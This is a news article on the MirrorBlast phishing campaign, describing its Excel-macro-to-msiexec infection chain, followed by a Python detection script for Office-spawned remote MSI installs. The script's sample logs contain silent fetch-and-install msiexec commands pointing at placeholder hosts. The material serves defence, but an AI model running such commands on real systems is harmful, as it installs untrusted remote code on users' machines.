Employees in the financial services sector are being targeted by a new phishing campaign that uses links to download a ‘weaponized’ Excel sheet. ET Labs, a security firm, discovered the phishing operation and nicknamed it MirrorBlast.
Morphisec, another security firm, has since analyzed the malware and concluded that the malicious Excel files can evade malware detection systems because they contain “extremely lightweight” embedded macros. That makes the files “particularly dangerous” for organizations that rely on detection-based security and sandboxing.
Macros, which are programs that automate activities, have become a popular tool for cybercriminals. Although macros are disabled by default in Excel, attackers employ social engineering to persuade potential victims to enable them.
Although macros look like a simple approach, state-sponsored hackers have also employed them because they usually bring results. Earlier this year, Microsoft extended its Antimalware Scan Interface (AMSI), which antivirus products hook into, to combat the rise in macro malware and a new tendency among attackers to evade anti-malware systems by using the legacy Excel 4.0 XLM macros rather than the newer VBA macros.
According to Morphisec, the MirrorBlast attack chain is similar to tactics employed by TA505, a well-known, financially motivated, Russia-based cybercriminal gang that researchers have tracked for years.
According to Morphisec analyst Arnold Osipov, TA505 is best known for regularly changing the malware it employs and for driving worldwide malware distribution trends.
The MirrorBlast attack begins with a document attached to an email and progresses to a Google feedproxy URL carrying a SharePoint or OneDrive lure masquerading as a file-transfer request. Visiting the URL sends the victim to a compromised SharePoint site or a fake OneDrive page, and either version can host the malicious Excel document.
The sample MirrorBlast email uses the theme of a company-issued notice about COVID-related changes to working arrangements.
Morphisec states that, because of ActiveX object compatibility issues, the macro code can only run on 32-bit Office. The macro itself runs JavaScript to avoid sandboxing and checks whether the computer is running in administrator mode. It then launches the msiexec.exe process, which downloads and installs an MSI package.
Morphisec discovered two MSI installer versions, which make use of the legitimate scripting tools KiXtart and REBOL.
The KiXtart script transmits the domain, user name, computer name, and process list of the victim’s machine to the attacker’s command and control server. The server then answers with a number indicating whether the REBOL version should be used.
According to Morphisec, the REBOL script connects to a remote access tool called FlawedGrace, which the group has used before.
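The Excel-to-msiexec stage described above leaves a distinctive trace in process-creation telemetry: an Office application spawning msiexec.exe with a package pulled from a URL. The following detection logic is an added example, not code from the article or from Morphisec; the Sysmon-style JSON events and every path and URL in them are constructed for illustration.

```python
"""Flag Office-spawned msiexec installs of remote MSI packages in process-creation logs.

Added example; the event format (Sysmon Event ID 1-like fields) and the sample
events below are constructed, not taken from the MirrorBlast campaign.
"""
import json
import re
from typing import List, Optional

# Office hosts that should not normally be launching the Windows Installer
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# msiexec fetching its package from a URL: "/i http://..." or "/package https://..."
REMOTE_MSI = re.compile(r"[/-](?:i|package)\s+\"?(https?://[^\s\"]+)", re.IGNORECASE)

# Constructed sample events, one JSON object per line (example.invalid is a reserved TLD)
SAMPLE_LOG = r"""
{"ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\SysWOW64\\msiexec.exe", "CommandLine": "msiexec.exe /i http://example.invalid/update.msi /qn"}
{"ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "C:\\Windows\\system32\\msiexec.exe /V"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec /i C:\\installers\\app.msi /quiet"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec /package https://updates.example.invalid/tool.msi"}
""".strip()


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> Optional[dict]:
    """Return a finding for one process-creation event, or None if it looks benign."""
    if _basename(event.get("Image", "")) != "msiexec.exe":
        return None
    match = REMOTE_MSI.search(event.get("CommandLine", ""))
    if not match:
        return None  # local package, or the msiexec service instance itself (/V)
    parent = _basename(event.get("ParentImage", ""))
    # Office parent plus remote package is the MirrorBlast-style chain; remote
    # package from any other parent is still worth a look, at lower severity.
    severity = "high" if parent in OFFICE_PARENTS else "medium"
    return {"severity": severity, "parent": parent, "package_url": match.group(1)}


def scan(log_text: str) -> List[dict]:
    """Run classify() over newline-delimited JSON events, skipping malformed lines."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify(event)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] parent={f['parent']} package={f['package_url']}")
```

The 32-bit Office requirement noted above also means the spawned msiexec.exe lives under SysWOW64 on a 64-bit host, which is a useful secondary field to record in a real rule.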